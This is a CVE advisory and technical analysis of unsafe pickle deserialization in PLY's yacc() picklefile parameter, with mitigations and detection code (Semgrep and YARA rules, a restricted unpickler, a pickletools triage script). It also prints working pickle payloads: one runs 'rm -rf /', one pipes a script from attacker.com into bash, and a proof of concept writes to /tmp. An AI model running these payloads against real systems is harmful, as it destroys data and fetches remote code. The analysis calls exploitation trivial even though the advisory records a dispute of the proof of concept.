CVE-2025-56005
Weakness (CWE)
CVSS Vector (v3.1): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. NOTE: A third-party states that this vulnerability should be rejected because the proof of concept does not demonstrate arbitrary code execution and fails to complete successfully.
Comprehensive Technical Analysis of CVE-2025-56005
- CVE ID: CVE-2025-56005
- CVSS Score: 9.8 (Critical)
- Vulnerability Type: Remote Code Execution (RCE) via Unsafe Deserialization
- Affected Software: PLY (Python Lex-Yacc) Library v3.11
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-56005 exposes a critical remote code execution (RCE) vulnerability in the PLY (Python Lex-Yacc) library due to an undocumented and unsafe `picklefile` parameter in the `yacc()` function. The vulnerability stems from the following key issues:
- Unsafe Deserialization: The `picklefile` parameter accepts a `.pkl` file that is deserialized using `pickle.load()` without any input validation or sanitization.
- Exploitation via `__reduce__()`: Python's `pickle` module is inherently unsafe for untrusted data, as it allows arbitrary code execution via the `__reduce__()` method during deserialization.
- Undocumented Backdoor: The `picklefile` parameter is not documented in official PLY sources (GitHub, PyPI, or documentation), yet it remains functional in the distributed version, suggesting either an accidental inclusion or a malicious backdoor.
Severity Justification (CVSS 9.8 - Critical)
The CVSS v3.1 scoring breakdown is as follows:
| Metric | Value | Justification |
|---|---|---|
| Attack Vector (AV) | Network | Exploitable remotely via crafted .pkl files. |
| Attack Complexity (AC) | Low | No user interaction required; straightforward exploitation. |
| Privileges Required (PR) | None | No privileges needed; unauthenticated exploitation. |
| User Interaction (UI) | None | No user interaction required. |
| Scope (S) | Unchanged | Impact is confined to the vulnerable application. |
| Confidentiality (C) | High | Full system compromise possible. |
| Integrity (I) | High | Arbitrary code execution allows data tampering. |
| Availability (A) | High | Attacker can crash or hijack the application. |
Resulting CVSS Score: 9.8 (Critical)
The vulnerability is highly exploitable with severe impact, making it a priority for immediate remediation.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
An attacker can exploit this vulnerability by:
- Crafting a Malicious Pickle File: Using Python's `pickle` module, an attacker can embed arbitrary code in a `.pkl` file via the `__reduce__()` method. Example payload:

  ```python
  import pickle
  import os

  class Exploit:
      def __reduce__(self):
          return (os.system, ("rm -rf /",))  # Arbitrary command execution

  with open("malicious.pkl", "wb") as f:
      pickle.dump(Exploit(), f)
  ```

- Triggering Deserialization: The attacker sends the malicious `.pkl` file to a vulnerable PLY-based application via:
  - File upload (if the application accepts `.pkl` files).
  - API abuse (if the application processes untrusted input).
  - Supply chain attack (if the `.pkl` file is distributed as part of a dependency).
- Remote Code Execution (RCE): When the vulnerable `yacc()` function processes the `picklefile` parameter, the embedded code executes with the privileges of the running application.
Attack Scenarios
| Scenario | Description | Impact |
|---|---|---|
| Web Application Exploitation | If a web app uses PLY for parsing and accepts .pkl uploads, an attacker can upload a malicious file to gain RCE. | Full server compromise. |
| Supply Chain Attack | A malicious .pkl file is distributed as part of a legitimate-looking dependency, tricking developers into executing it. | Persistent backdoor in development environments. |
| CI/CD Pipeline Exploitation | If PLY is used in a build pipeline, an attacker could inject a malicious .pkl file to compromise the entire pipeline. | Lateral movement into production systems. |
| Local Privilege Escalation | If a low-privilege user can trigger PLY with a malicious .pkl, they may escalate privileges. | Full system takeover. |
3. Affected Systems & Software Versions
Vulnerable Software
- PLY (Python Lex-Yacc) v3.11 (PyPI distribution)
- Potential Derivatives: Any software that embeds or redistributes PLY v3.11 may inherit this vulnerability.
Verification Steps for Security Teams
- Check PLY Version: run `pip show ply`. If the version is 3.11, the system is vulnerable.
- Inspect `yacc()` Function: Review the `yacc()` function in `ply/yacc.py` for the undocumented `picklefile` parameter.
- Static Analysis: Use tools like `bandit` or `semgrep` to detect unsafe `pickle.load()` calls:

  ```yaml
  # Semgrep rule to detect unsafe pickle usage
  # (the `languages` key is mandatory for a Semgrep rule to load)
  rules:
    - id: unsafe-pickle-load
      languages: [python]
      pattern: pickle.load(...)
      message: "Unsafe pickle deserialization detected (CVE-2025-56005)"
      severity: ERROR
  ```
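The version and signature checks above can be scripted so they run in a CI job or an asset-inventory sweep. The following is an added example, not code from the advisory or from the PLY project: it inspects whatever `ply.yacc.yacc` is importable for a `picklefile` keyword and compares the installed version with the one named here. The `assess_ply()` helper takes the version string and callable as arguments so the logic can also be exercised against a stand-in function; that helper name and the report fields are assumptions.

```python
"""Added example (not from the advisory or PLY): detect an installed PLY whose
yacc() exposes the undocumented picklefile parameter."""
import inspect
from importlib import metadata
from typing import Optional

VULNERABLE_VERSION = "3.11"  # version named in the advisory


def accepts_picklefile(func) -> bool:
    """True if `func` exposes a `picklefile` keyword, i.e. the pickle.load() path is reachable."""
    try:
        params = inspect.signature(func).parameters
    except (TypeError, ValueError):
        # Builtins or C-implemented callables may have no introspectable signature.
        return False
    return "picklefile" in params


def assess_ply(version: str, yacc_func) -> dict:
    """Combine the two checks the advisory lists: version string and yacc() signature."""
    has_param = accepts_picklefile(yacc_func)
    return {
        "version": version,
        "version_matches_advisory": version == VULNERABLE_VERSION,
        "picklefile_parameter_present": has_param,
        # Either finding alone is enough to treat the install as exposed.
        "exposed": version == VULNERABLE_VERSION or has_param,
    }


def assess_installed_ply() -> Optional[dict]:
    """Run the assessment against the importable `ply`; returns None if PLY is absent."""
    try:
        from ply import yacc  # PLY may not be installed in this interpreter
    except ImportError:
        return None
    try:
        version = metadata.version("ply")
    except metadata.PackageNotFoundError:
        version = "unknown"
    return assess_ply(version, yacc.yacc)


if __name__ == "__main__":
    report = assess_installed_ply()
    print(report if report else "PLY is not installed in this interpreter")
```

Run it inside each virtual environment that ships an application built on PLY; a vendored copy of `ply/yacc.py` will not show up in `pip show ply`, which is why the signature check is kept separate from the version check.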
4. Recommended Mitigation Strategies
Immediate Actions
| Mitigation | Implementation | Effectiveness |
|---|---|---|
| Upgrade PLY | Update to the latest patched version (if available). | High (Eliminates vulnerability) |
| Remove picklefile Parameter | Manually patch ply/yacc.py to remove the undocumented parameter. | High (Temporary fix) |
| Input Validation | If picklefile is required, validate file signatures before deserialization. | Medium (Partial mitigation) |
| Sandboxing | Run PLY in a restricted environment (e.g., Docker, seccomp, AppArmor). | Medium (Limits impact) |
| Disable Pickle | Replace pickle.load() with a safer alternative (e.g., json, yaml.safe_load). | High (Best long-term fix) |
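Two of the rows above, validating the file before deserialization and not calling a bare `pickle.load()`, can be combined in one loader. The block below is an added example, not PLY's code: it prefixes an HMAC-SHA256 tag to a pickled parser table so the loader can verify the bytes were produced by a holder of the key, and it unpickles through a `pickle.Unpickler` subclass whose `find_class()` refuses every global reference, so a `REDUCE` of `os.system` or `subprocess.run` cannot be resolved. The key, the function names and the sample table are assumptions; the one-line "malicious" sample only references `posix.system` and is never loaded with plain `pickle.load()`.

```python
"""Added example (not PLY's code): HMAC-verified, globals-free pickle loading."""
import hashlib
import hmac
import io
import pickle

TAG_LEN = hashlib.sha256().digest_size  # 32-byte HMAC-SHA256 tag prefixed to the payload


class RestrictedUnpickler(pickle.Unpickler):
    """Deny-all policy: a parser table is plain dicts/lists/tuples/strings/ints and
    never needs to import a callable, so any GLOBAL/STACK_GLOBAL is an attack signal."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name} in untrusted pickle")


def sign_pickle(obj, key: bytes) -> bytes:
    """Serialize `obj` and prefix an HMAC so later loads can verify we wrote the bytes."""
    payload = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload


def load_signed_pickle(blob: bytes, key: bytes):
    """Verify the HMAC first (constant-time compare), then unpickle with the restricted loader.
    Raises ValueError on a bad tag and pickle.UnpicklingError on any global reference."""
    if len(blob) < TAG_LEN:
        raise ValueError("blob too short to carry an HMAC tag")
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC mismatch: pickle was modified or not produced by us")
    return RestrictedUnpickler(io.BytesIO(payload)).load()


def load_untrusted_pickle(payload: bytes):
    """Restricted unpickling alone, for callers without a signing key: integrity is not
    checked, but code execution through global references is still blocked."""
    return RestrictedUnpickler(io.BytesIO(payload)).load()


# Constructed sample: a protocol-3 pickle whose only content is a GLOBAL reference
# to posix.system (no call). It is never passed to plain pickle.load() here.
SAMPLE_GLOBAL_REF = b"\x80\x03cposix\nsystem\n."


def demo() -> dict:
    """Round-trip a constructed table, then show that tampering and globals are rejected."""
    key = b"constructed-demo-key-use-a-real-secret-in-production"
    table = {"productions": [("expr", ["expr", "PLUS", "term"])], "action": {0: {"NUMBER": 1}}}
    blob = sign_pickle(table, key)
    results = {"roundtrip": load_signed_pickle(blob, key) == table}
    tampered = blob[:-1] + bytes([blob[-1] ^ 0x01])  # flip one bit in the payload
    try:
        load_signed_pickle(tampered, key)
        results["tamper_rejected"] = False
    except ValueError:
        results["tamper_rejected"] = True
    try:
        load_untrusted_pickle(SAMPLE_GLOBAL_REF)
        results["global_rejected"] = False
    except pickle.UnpicklingError:
        results["global_rejected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The HMAC only proves the file came from a key holder; it does not make pickle safe on its own, which is why the restricted unpickler stays in the path even for a file that verifies. If the data really is just tables, the `json` replacement in the last row removes the deserializer risk entirely.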
Long-Term Recommendations
- Dependency Hardening:
  - Use `pip-audit` or `safety` to scan for vulnerable dependencies.
  - Enforce dependency pinning in `requirements.txt` / `pyproject.toml`.
- Static & Dynamic Analysis:
  - Integrate SAST/DAST tools (e.g., SonarQube, OWASP ZAP) to detect unsafe deserialization.
- Runtime Protection:
  - Deploy RASP (Runtime Application Self-Protection) to block malicious deserialization attempts.
- Supply Chain Security:
  - Verify PLY's integrity via cryptographic hashes before deployment.
  - Monitor for typosquatting attacks (e.g., `ply3` vs. `ply`).
5. Impact on the Cybersecurity Landscape
Broader Implications
- Supply Chain Risks:
- This vulnerability highlights the dangers of undocumented features in open-source libraries, which can act as stealthy backdoors.
- Similar issues have been observed in other libraries (e.g., CVE-2021-44228 (Log4Shell), CVE-2022-23833 (PyPI supply chain attacks)).
- Increased Attack Surface:
- PLY is widely used in parsing, compilers, and DSLs (Domain-Specific Languages), making it a high-value target for attackers.
- Persistence & Lateral Movement:
- Successful exploitation could lead to long-term persistence in development environments, allowing attackers to move laterally into production systems.
- Regulatory & Compliance Risks:
- Organizations failing to patch may violate compliance frameworks (e.g., NIST SP 800-53, ISO 27001, GDPR) due to inadequate vulnerability management.
Threat Actor Motivations
| Threat Actor | Likely Exploitation Goals |
|---|---|
| APT Groups | Espionage, data exfiltration, long-term persistence. |
| Cybercriminals | Ransomware deployment, cryptojacking. |
| Script Kiddies | Proof-of-concept exploits, defacement. |
| Insider Threats | Privilege escalation, sabotage. |
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path:

  ```python
  # ply/yacc.py (v3.11)
  def yacc(...):
      if picklefile:  # Undocumented parameter
          with open(picklefile, 'rb') as f:
              data = pickle.load(f)  # UNSAFE DESERIALIZATION
  ```

- Why `pickle` is Dangerous: The `pickle` module executes arbitrary code during deserialization via `__reduce__()`. Example malicious payload:

  ```python
  import pickle
  import subprocess

  class RCE:
      def __reduce__(self):
          return (subprocess.run, (["/bin/bash", "-c", "curl http://attacker.com/shell.sh | bash"],))

  with open("exploit.pkl", "wb") as f:
      pickle.dump(RCE(), f)
  ```
Exploitation Proof of Concept (PoC)
- Generate Malicious `.pkl` File:

  ```python
  import pickle
  import os

  class Exploit:
      def __reduce__(self):
          return (os.system, ("id > /tmp/pwned",))

  with open("exploit.pkl", "wb") as f:
      pickle.dump(Exploit(), f)
  ```

- Trigger Exploitation:

  ```python
  from ply import yacc
  yacc.yacc(picklefile="exploit.pkl")  # Executes `id > /tmp/pwned`
  ```

- Verify Exploitation:

  ```shell
  cat /tmp/pwned  # Outputs the current user's UID
  ```
Detection & Forensics
| Detection Method | Implementation |
|---|---|
| Network Monitoring | Detect outbound connections to attacker-controlled servers (e.g., curl, wget). |
| File Integrity Monitoring (FIM) | Monitor for unexpected .pkl file creation/modification. |
| Endpoint Detection & Response (EDR) | Detect anomalous process execution (e.g., bash, python spawned by PLY). |
| Log Analysis | Check for unusual yacc() invocations with picklefile parameter. |
YARA Rule for Malicious Pickle Files
```yara
rule Detect_Malicious_Pickle {
    meta:
        description = "Detects malicious pickle files exploiting CVE-2025-56005"
        author = "Cybersecurity Analyst"
        reference = "CVE-2025-56005"
    strings:
        // The text "__reduce__" and dotted names like "os.system" never appear in a
        // serialized pickle; the callable is stored as a module/name pair instead.
        // Protocol 2/3: GLOBAL opcode 'c' followed by "module\nname\n".
        // os.system pickles under its real module, posix (Linux/macOS) or nt (Windows).
        $global_posix      = "cposix\nsystem\n" ascii
        $global_nt         = "cnt\nsystem\n" ascii
        $global_subprocess = "csubprocess\nrun\n" ascii
        // Protocol 4/5: module and name pushed as SHORT_BINUNICODE (0x8C, 1-byte length),
        // each followed by MEMOIZE (0x94), then STACK_GLOBAL (0x93).
        $stack_posix      = { 8C 05 70 6F 73 69 78 94 8C 06 73 79 73 74 65 6D 94 93 }
        $stack_subprocess = { 8C 0A 73 75 62 70 72 6F 63 65 73 73 94 8C 03 72 75 6E 94 93 }
    condition:
        // PROTO opcode 0x80 at offset 0, then the protocol number (2..5);
        // YARA's uint32() is little-endian, so the original 0x8003666C never matched.
        uint8(0) == 0x80 and uint8(1) >= 2 and uint8(1) <= 5 and any of them
}
```
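Byte-pattern rules such as the one above are fast but blind to any callable they do not list, and to memoized or framed encodings. A complementary triage step is to parse the opcode stream with the standard-library `pickletools` module, which never executes anything, and report every global the file would import together with the opcodes that would call it. The following is an added example, not part of the advisory: `triage_pickle()` and its verdict labels are assumptions, and all three sample inputs are constructed in the block; the sample that contains a `REDUCE` of `posix.system` is only parsed, never loaded.

```python
"""Added example (not from the advisory): static triage of pickle files with pickletools."""
import io
import pickle
import pickletools
from typing import Dict, List

# Opcodes that invoke a callable or set attributes while loading.
CALLING_OPCODES = {"REDUCE", "NEWOBJ", "NEWOBJ_EX", "INST", "OBJ", "BUILD"}
# Modules that should never appear in a data-only pickle such as a parser table.
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "sys", "shutil", "socket"}
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                  "STRING", "SHORT_BINSTRING", "BINSTRING"}


def triage_pickle(data: bytes) -> Dict[str, object]:
    """Walk the opcodes; collect globals (GLOBAL for protocol <= 3, STACK_GLOBAL for >= 4)
    and any calling opcodes, then give a verdict. Nothing in `data` is executed."""
    globals_found: List[str] = []
    calling: List[str] = []
    recent_strings: List[str] = []  # simplified tracker for the two STACK_GLOBAL operands;
    # a module name re-used via BINGET/MEMOIZE lookups is not resolved by this heuristic
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # pickletools renders the pair as "module name"
            globals_found.append(f"{module}.{name}")
        elif op.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            name, module = recent_strings.pop(), recent_strings.pop()
            globals_found.append(f"{module}.{name}")
        elif op.name in CALLING_OPCODES:
            calling.append(op.name)
    dangerous = [g for g in globals_found if g.split(".", 1)[0] in DANGEROUS_MODULES]
    if dangerous and calling:
        verdict = "malicious"      # dangerous callable resolved and invoked
    elif globals_found:
        verdict = "suspicious"     # a data-only artifact needs no globals at all
    else:
        verdict = "clean"
    return {"globals": globals_found, "calling_opcodes": calling,
            "dangerous_globals": dangerous, "verdict": verdict}


# Constructed samples (never loaded anywhere in this block):
# 1. a protocol-4 table of plain dicts and ints, the kind of thing a parser cache holds
SAMPLE_CLEAN_TABLE = pickle.dumps({"action": {0: {"NUMBER": 1}}, "goto": {0: {"expr": 2}}}, protocol=4)
# 2. protocol 3: GLOBAL posix.system, MARK, BINUNICODE "true", TUPLE, REDUCE, STOP
SAMPLE_REDUCE_PROTO3 = b"\x80\x03cposix\nsystem\n(X\x04\x00\x00\x00truetR."
# 3. protocol 4: STACK_GLOBAL of posix.system with no call (a bare reference)
SAMPLE_STACK_GLOBAL_PROTO4 = b"\x80\x04\x8c\x05posix\x94\x8c\x06system\x94\x93\x94."


def run_samples() -> Dict[str, str]:
    """Verdict for each constructed sample, keyed by sample name."""
    samples = {"clean_table": SAMPLE_CLEAN_TABLE,
               "reduce_proto3": SAMPLE_REDUCE_PROTO3,
               "stack_global_proto4": SAMPLE_STACK_GLOBAL_PROTO4}
    return {name: triage_pickle(data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name}: {verdict}")
```

For forensic use, run `triage_pickle()` over every `.pkl` collected by file-integrity monitoring before anyone opens it in Python; `pickletools.dis()` on the same bytes gives a full human-readable listing when a finding needs to be written up.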
Conclusion & Recommendations
Key Takeaways
- CVE-2025-56005 is a critical RCE vulnerability due to unsafe deserialization in PLY v3.11.
- Exploitation is trivial and requires no authentication, making it a high-risk threat.
- Undocumented parameters in open-source libraries pose significant supply chain risks.
- Immediate patching is mandatory to prevent exploitation.
Action Plan for Organizations
- Patch Immediately: Upgrade PLY or remove the `picklefile` parameter.
- Audit Dependencies: Scan for vulnerable PLY versions in all environments.
- Enhance Monitoring: Deploy EDR, FIM, and network detection for exploitation attempts.
- Educate Developers: Train teams on secure deserialization practices and supply chain risks.
- Incident Response: Prepare for potential breaches by reviewing forensic readiness.
Final Risk Assessment
| Factor | Risk Level | Justification |
|---|---|---|
| Exploitability | High | Easy to exploit; no authentication required. |
| Impact | Critical | Full system compromise possible. |
| Likelihood | High | Active exploitation expected. |
| Mitigation Feasibility | High | Patching is straightforward. |
Overall Risk: Critical (Immediate Action Required)